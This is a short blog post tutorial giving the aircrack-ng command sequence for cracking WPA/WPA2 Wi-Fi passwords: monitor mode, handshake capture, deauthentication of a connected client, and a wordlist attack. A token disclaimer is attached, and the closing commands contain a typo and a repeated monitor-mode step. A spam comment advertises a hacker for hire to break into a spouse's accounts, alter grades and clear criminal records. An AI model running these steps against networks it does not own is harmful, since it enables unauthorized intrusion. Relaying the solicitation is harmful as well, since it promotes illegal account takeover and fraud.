Sunday 13 September 2015

Crack WPA & WPA2 with Aircrack-ng on Kali Linux



In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.
Note: This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

Things we used for cracking WPA & WPA2:

Command to crack WPA & WPA2:

airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux:

In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

1 comment:

  1. Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete